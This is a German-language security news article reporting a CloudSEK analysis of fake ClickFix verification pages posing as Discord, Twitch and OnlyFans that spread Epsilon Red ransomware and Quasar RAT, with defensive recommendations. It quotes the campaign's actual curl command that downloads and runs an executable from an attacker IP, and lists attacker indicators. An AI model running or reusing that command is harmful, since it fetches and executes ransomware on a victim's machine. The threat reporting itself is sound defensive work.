OnlyFans und Discord ClickFix-Seiten verbreiten Epsilon Red Ransomware

Eine ausgeklügelte neue Ransomware-Kampagne täuscht Internetnutzer auf der ganzen Welt, indem sie gefälschte Verifizierungsseiten verwendet, um eine gefährliche Bedrohung namens Epsilon Red-Malware zu verbreiten.

Dieses kritische Ergebnis geht aus dem neuesten Bedrohungsbericht von CloudSEK hervor, einem führenden Cybersicherheitsunternehmen. Die laufende Kampagne, die erstmals im Juli 2025 entdeckt wurde, nutzt Social Engineering, bei dem sich Angreifer als beliebte Onlinedienste wie Discord , Twitch und OnlyFans ausgeben. Sie verleiten Benutzer dazu, schädliche .HTA Dateien herunterzuladen. Dabei handelt es sich um spezielle HTML-Anwendungen, die Skripte direkt auf einem Computer ausführen können.

Laut CloudSec werden im Hintergrund schädliche Befehle ausgeführt, ohne dass ein Opfer davon weiß, wenn es auf einer der gefälschten Verifizierungsseiten mit ClickFix-Thema landet und mit dieser interagiert.

Dies geschieht durch den Missbrauch von ActiveX , einer Technologie, die interaktive Inhalte in Webbrowsern ermöglicht. Bei diesem Angriff lädt das bösartige Skript die Epsilon Red- Ransomware unbemerkt von einem versteckten Ort herunter und führt sie aus, wobei normale Sicherheitsüberprüfungen umgangen werden.

Die mit Hackread.com geteilte Analyse von CloudSEK ergab die Befehle curl -s -o a.exe http://155.94.155227:2269/dw/vir.exe && a.exe , die die Ransomware herunterladen und ausführen, ohne dass dem Benutzer ein typisches Download-Fenster angezeigt wird.

Anschließend wird eine gefälschte Verifizierungsnachricht angezeigt, die den Benutzer fälschlicherweise glauben lässt, alles sei normal. Bemerkenswert ist der kleine Tippfehler in der gefälschten Nachricht „Verificatification“, der möglicherweise absichtlich eingefügt wurde, um weniger verdächtig zu wirken.

Das für diese Entdeckung verantwortliche TRIAD-Team von CloudSEK stellte fest, dass diese neue Variante die Opfer im Gegensatz zu älteren Versionen ähnlicher Angriffe, bei denen schädliche Befehle einfach in die Zwischenablage kopiert wurden, auf eine zweite Seite weiterleitet, auf der die Infektion ohne klare Warnung erfolgt.

Die Infrastruktur dieser Kampagne umfasst mehrere gefälschte Domänen und IP-Adressen, die wie legitime Dienste aussehen sollen, darunter ein gefälschter Discord Captcha Bot. Sie fanden auch einige Lockseiten mit Dating- oder Romantik-Themen. Darüber hinaus wurde eine weitere Malware, ein Quasar RAT , mit dieser Kampagne verknüpft, was auf das Potenzial für Fernsteuerung neben Ransomware hindeutet.

Die Ransomware Epsilon Red, die erstmals 2021 auftauchte, hinterlässt Lösegeldforderungen, die denen der bekannten Ransomware REvil ähneln, sich aber ansonsten in ihrer Funktionsweise unterscheiden. Dies verdeutlicht einen Trend, bei dem verschiedene Ransomware-Gruppen Elemente voneinander übernehmen könnten.

Zum Schutz vor dieser neuen Bedrohung empfiehlt CloudSEK einige wichtige Schritte. Benutzer sollten ActiveX und Windows Script Host (WSH) in den Computereinstellungen deaktivieren, um die Ausführung solcher Skripte zu blockieren. Unternehmen sollten außerdem Threat Intelligence Feeds nutzen, um bekannte IP-Adressen und Domänen von Angreifern, wie z. B. twtichcc und 155.94.155227:2269 , sofort zu blockieren.

Darüber hinaus sollten Endpunkt-Sicherheitstools so eingerichtet werden, dass sie ungewöhnliche versteckte Aktivitäten erkennen, beispielsweise Programme, die im Hintergrund von Webbrowsern ausgeführt werden. Schließlich ist kontinuierliches Sicherheitsbewusstseinstraining unerlässlich. Es soll den Benutzern beibringen, gefälschte Verifizierungsseiten und Social-Engineering- Versuche zu erkennen und zu vermeiden, selbst wenn sie sich als bekannte Online-Plattformen ausgeben.